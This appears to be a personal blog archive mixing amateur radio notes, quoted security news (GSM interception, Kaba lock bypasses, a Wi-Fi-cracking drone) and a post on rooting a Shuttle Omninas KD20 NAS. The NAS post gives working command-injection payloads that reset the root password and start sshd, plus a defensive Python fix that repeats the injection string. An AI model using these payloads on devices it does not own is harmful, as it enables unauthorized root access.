amateur radio


My first taste of Amateur Radio was in the early 90s – I have a ‘replacement’ operators certificate dated 1991, and maybe even one of my original yellow licenses from the Department of Communications kicking around in a box somewhere.

It’s been a while since I’ve messed around with amateur radio. I use APRS on and off for various reasons, but voice nets weren’t really of interest, and data networking was always pretty interesting to me. In the 90s I played around with AX.25 and even went to Vancouver Area Packet Organization meetings but as AX.25/IP gradually died out I found other interesting use cases in the ISM bands to play with.

QRM and digital modes have been on my radar for a while. One of these days I’ll get more into HF work, but lately I’ve been eyeballing the need for a new HT – and location tracking is pretty much mandatory. I’m not interested in spending a lot on an HT either and as a result, I’m eagerly awaiting my BTECH DMR-6X2 to mess with.

The thing does APRS over analog, and SMS over DMR intrigues me. Actually, 9600 bps over 2×6.5 kHz channels intrigues me – but that’s a post for another day.

In the meantime... notes to self:


Folding@home Now More Powerful Than World’s Top 7 Supercomputers, Combined

Propelled by average enthusiasts in their shared quest to defeat COVID-19, the Folding@home network is now pushing out 470 PetaFLOPS of raw compute power. To put that in perspective, that’s twice as fast as Summit, the world’s fastest supercomputer, making the network faster than any known supercomputer. It’s also faster than the top seven supercomputers in the world, combined.


Tobias Engel: SS7: Locate. Track. Manipulate.


Getting root (and SSHD on boot) with the Shuttle Omninas KD20

I recently picked up a Shuttle Omninas KD20 on sale from NCIX. It runs Linux, but sshd is disabled by default. Thankfully it wasn’t too difficult to break into.


The Storage -> Disk Manager page has an info button that calls smartctl -a. It doesn’t check the parameters passed by the page, so anything after the device name is handed to the shell as-is.

With the Disk Manager page loaded, open your Web Developer Console and run the following JavaScript commands:

(pastebin text version; thanks to scotty86 for the paste)



// jQuery $.ajax wrapper reconstructed around the fragments left in the post;
// the url value did not survive the paste.
$.ajax({
    url: '',
    cache: false,
    //data: "devName=sda"+$devName,
    data: "devName=/dev/sd; (echo \"foobar\nfoobar\n\" | sudo passwd root) ",
});
// Changing the root password

$.ajax({
    url: '',
    cache: false,
    //data: "devName=sda"+$devName,
    data: "devName=/dev/sd; sudo /etc/rc.d/ start",
});
// start sshd

With those simple little ajaxy functions I was able to access the device via ssh:

login as: root
[email protected]'s password:
BusyBox v1.10.3 (2013-11-06 11:05:30 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

Filesystem 1k-blocks Used Available Use% Mounted on
/dev/ram0 15863 2134 13729 13% /initrd
/dev/md0 201556 372 190948 0% /system
/dev/md1 1463634048 27294636 1436339412 2% /share/atonnas
OMNINAS-XYZZY> cd /proc/
OMNINAS-XYZZY> cat cpuinfo
Processor : ARMv6-compatible processor rev 5 (v6l)
processor : 0
BogoMIPS : 299.00

processor : 1
BogoMIPS : 299.82

Features : swp half thumb fastmult edsp java
CPU implementer : 0x41
CPU architecture: 7
CPU variant : 0x0
CPU part : 0xb02
CPU revision : 5

Hardware : Oxsemi NAS
Revision : 0000
Serial : 0000000000000000


It would be nice if Shuttle just enabled ssh by default though.  Pretty please?
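A defender-side illustration, added here and not part of the original post or of Shuttle’s firmware: the handler behind the Disk Manager info button should have treated devName as data, never as shell text. The allow-list, argv builder and command counter below are my own; the counter uses Python’s shlex to show how a POSIX shell would split the interpolated string, and the injection string is a constructed copy of the first ajax call’s devName value.

```python
import re
import shlex
from typing import List

# Constructed copy of the devName value the post's first ajax call sends
# (the JavaScript \" and \n escapes resolved to the bytes the CGI would receive).
INJECTED_DEV_NAME = '/dev/sd; (echo "foobar\nfoobar\n" | sudo passwd root) '

# Allow-list: the Disk Manager page only ever needs a whole-disk name such as
# "sda" or "/dev/sda"; anything else is rejected before smartctl is involved.
DEV_NAME_RE = re.compile(r"^(?:/dev/)?(sd[a-z])$")

# Tokens a POSIX shell treats as command separators or pipeline operators.
SEPARATORS = {";", "|", "||", "&", "&&"}


def is_safe_dev_name(dev_name: str) -> bool:
    """True only for a plain whole-disk device name from the allow-list."""
    return DEV_NAME_RE.fullmatch(dev_name.strip()) is not None


def build_smartctl_argv(dev_name: str) -> List[str]:
    """Return argv for `smartctl -a` with the device as one argument.

    Passed to subprocess.run(argv) with shell=False, the device name reaches
    smartctl verbatim; there is no shell to interpret ';', '|' or '('.
    Raises ValueError for anything outside the allow-list.
    """
    m = DEV_NAME_RE.fullmatch(dev_name.strip())
    if m is None:
        raise ValueError(f"rejected device name: {dev_name!r}")
    return ["smartctl", "-a", f"/dev/{m.group(1)}"]


def count_shell_commands(dev_name: str) -> int:
    """How many separate commands a POSIX shell would run for the original
    handler's 'smartctl -a <devName>' string with dev_name spliced in raw.

    shlex with punctuation_chars makes ';', '|', '(' and ')' their own tokens,
    the way sh(1) parses them. A result of 1 means the input stayed data.
    """
    lexer = shlex.shlex(f"smartctl -a {dev_name}", posix=True, punctuation_chars=True)
    return 1 + sum(1 for tok in lexer if tok in SEPARATORS)


if __name__ == "__main__":
    print(build_smartctl_argv("/dev/sda"))          # ['smartctl', '-a', '/dev/sda']
    print(count_shell_commands("/dev/sda"))         # 1
    print(count_shell_commands(INJECTED_DEV_NAME))  # 3
    print(is_safe_dev_name(INJECTED_DEV_NAME))      # False
```

The allow-list belongs in the CGI handler itself, not in the page’s JavaScript, since the browser-side form is exactly what the console calls above step around.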


Smart meter SSL screw-up reveals a bit too much information

The researchers said German firm Discovergy apparently allowed information gathered by its smart meters to travel over an insecure link to its servers. The information – which could be intercepted – apparently could be interpreted to reveal not only whether or not users happened to be at home and consuming electricity at the time but even what film they were watching, based on the fingerprint of power usage.


What if They Declared an Emergency and No One Came?

The Attawapiskat First Nation is in such a dire state that it has declared a state of emergency – but no level of Government or aid agency has come to their aid. The local grade school shut down 12 years ago thanks to toxic contamination – 13-year-olds have had to step up to draw attention all the way from the United Nations. Yet right next door is the De Beers Victor mine – the richest Diamond Mine in the Western World.


Low Cost/Low-Power/DIY Cellular data network


Shareable recently covered a group of residents of Jalalabad, Afghanistan who built their own open-source wireless network from junk and everyday household items. For the less-industrious yet DIY-inclined, the Village Base Station (pdf) is a low-power, easy to deploy tool developed by Berkeley professor Kurtis Heimerl to create a GSM cellular data network in areas with limited power and network resources. MobileActive recently got their hands on a prototype and tested it in a large American city, and the results were promising. In a post about the experiment, they note the benefits of the Village Base Station:

…flexible off-the-grid deployment due to low power requirements that enable local generation via solar or wind; explicit support for local services within the village that can be autonomous relative to a national carrier; novel power/coverage trade-offs based on intermittency that can provide bursts of wider coverage; and a portfolio of data and voice services (not just GSM).


4G and CDMA, GPRS reportedly hacked

Extremetech reports that a MITM attack was conducted against all 4G and CDMA transmissions in and around the DEFCON venue in Las Vegas.  Apparently the MITM attack allowed attackers to obtain full access to some Android and PC devices, and was able to monitor data and telephony sessions.

The Register is also reporting that Security Research Labs has developed a way to monitor GPRS conversations by exploiting weaknesses in the protocol. Demonstration software is expected to be released at CCC 2011. (In 2009 SRL’s Chief Scientist also coordinated release of a rainbow table to assist in cracking GSM, and in 2010 other cryptographers were able to defeat 3G encryption.)

Fun times!


Defcon Lockpickers Open Card-And-Code Government Locks In Seconds

Lockpicker Toby Bluzmanis inserts a wire into the LED readout of Kaba’s E-Plex 5800 to open the lock.

To open a door fitted with the latest U.S. government-certified lock from high-end Swiss lock manufacturer Kaba, an employee must both enter a code up to eight digits long, then swipe a unique identity card coded to comply with a new standard that requires an extra layer of security, one designed to track individual staffers and make covert intrusion harder than ever.

Or, as lockpicking expert Marc Weber Tobias will show a crowd of hackers Friday, you can stick a wire in the tiny display light above the keypad and instantly render all of that “security” irrelevant.

At the Defcon security conference in Las Vegas, Tobias and his partner Toby Bluzmanis plan to demonstrate a series of simple hardware hacks that expose critical security problems in Kaba’s E-plex 5800 and its older 5000. Zurich-based Kaba markets the 5800 lock, which Bluzmanis says can cost as much as $1,300, as the first to integrate code-based access controls with a new Department of Homeland Security standard that goes into effect next year and requires identifying credentials be used in secure facilities to control access.

In demonstrations for me and in videos they plan to show the Defcon audience, the lockpicking duo use one method called “rapping” to open the lock by simply hitting its top surface or lever handle with a mallet, compressing an internal spring that then decompresses and pushes open a latch that releases the lock. In another bypass, they insert a wire into a silicon cover for an LED light that blinks red when the user enters an invalid code. That wire can ground a contact on the circuit board behind the light that triggers a function intended to allow the door to be opened with a remote button, bypassing all its security measures.

A third attack allows an insider to open the back side of the lock and insert a wire that flips a microswitch intended as an override for power failures. That trick resets the lock’s software, tampering with its audit trail and allowing it to be reprogrammed with different codes. Bluzmanis demonstrated in a video that the more elaborate microswitch attack could be performed in under a minute.

“The issue is simply insecurity engineering,” says Tobias, who works as a consultant to several major lock firms and contributes blog posts to “They simply don’t get it.”


Flying Drone Can Crack Wi-Fi Networks, Snoop On Cell Phones

Mike Tassey posing with the Wireless Aerial Surveillance Platform, WASP.

How do one ex-Air Force official and one former airplane hobby shop owner, both of whom happen to have decades of experience as network security contractors for the military, spend their weekends? Building a flying, unmanned, automated password-cracking, Wi-Fi-sniffing, cell-phone eavesdropping spy drone, of course.

At the Black Hat and Defcon security conferences in Las Vegas next week, Mike Tassey and Richard Perkins plan to show the crowd of hackers a year’s worth of progress on their Wireless Aerial Surveillance Platform, or WASP, the second year Tassey and Perkins have displayed the 14-pound, six-foot long, six-foot wingspan unmanned aerial vehicle. The WASP, built from a retired Army target drone converted from a gasoline engine to electric batteries, is equipped with an HD camera, a cigarette-pack sized on-board Linux computer packed with network-hacking tools including the BackTrack testing toolset and a custom-built 340 million word dictionary for brute-force guessing of passwords, and eleven antennae.

“This is like Black Hat’s greatest hits,” Tassey says. “And it flies.”

On top of cracking wifi networks, the upgraded WASP now also performs a new trick: impersonating the GSM cell phone towers used by AT&T and T-Mobile to trick phones into connecting to the plane’s antenna rather than their carrier, allowing the drone to record conversations and text messages on 32 gigabytes of storage. A 4G T-Mobile card routes the communications through voice-over-Internet or traditional phone connections to avoid dropping the call. “Ideally, the target won’t even know he’s being spied on,” says Tassey.

That GSM hack is based on a demonstration that security researcher Chris Paget performed at Defcon last year, showing that with a powerful enough antenna placed close enough to target phones, the victims’ handsets can be tricked into connecting to Paget’s setup instead of the carrier’s tower. Perkins and Tassey have implemented the same tools in their airborne hacking machine, and like Paget, used a portion of the radio frequency band set aside for Ham radios to avoid violating FCC regulations. They don’t plan to demonstrate the phone-hacking trick at the conference, and tested it only in isolated conditions to ensure their flying contraption wasn’t illegally eavesdropping on random strangers’ phones. “We want to make sure we’re not stepping on any cell providers’ toes,” says Tassey.

And why build a digital spy drone? Perkins, an Air Force contractor focused on cybersecurity who once owned an airplane hobby shop, and Tassey, an ex-Air Force consultant with Engineering Systems Solutions, say they wanted to demonstrate the vulnerability of government and corporate facilities to a nimble eavesdropping machine that can cover large distances and circle above a target. Though it requires remote control to take off and land, WASP can be set to fly a pre-programmed course once airborne and loiter around any chosen area. “We wanted to bring to light how far the consumer industry has progressed, to the point where the public has access to technologies that put companies, and even governments at risk from this new threat vector that they’re not aware of,” says Perkins.

A military base like Area 51, Tassey points out, is surrounded by more than 25 miles of empty land to obscure it from outside snoops. “With WASP, we can cover that distance in about 20 minutes,” he says. “With radar designed specifically not to see birds, it’s very difficult to protect yourself from an object coming out of the sky and flying low.”

WASP’s design, complete with two eyes and a black-and-yellow striped paint job, isn’t exactly designed for stealth. But aside from showing real-world security risks, Tassey and Perkins also shared a goal just as appealing to Black Hat and Defcon’s crowd: pulling off a fantastically elaborate hack. “The number one reason we did this was because we were told it wouldn’t be possible,” says Perkins. “Neither of us like hearing that.”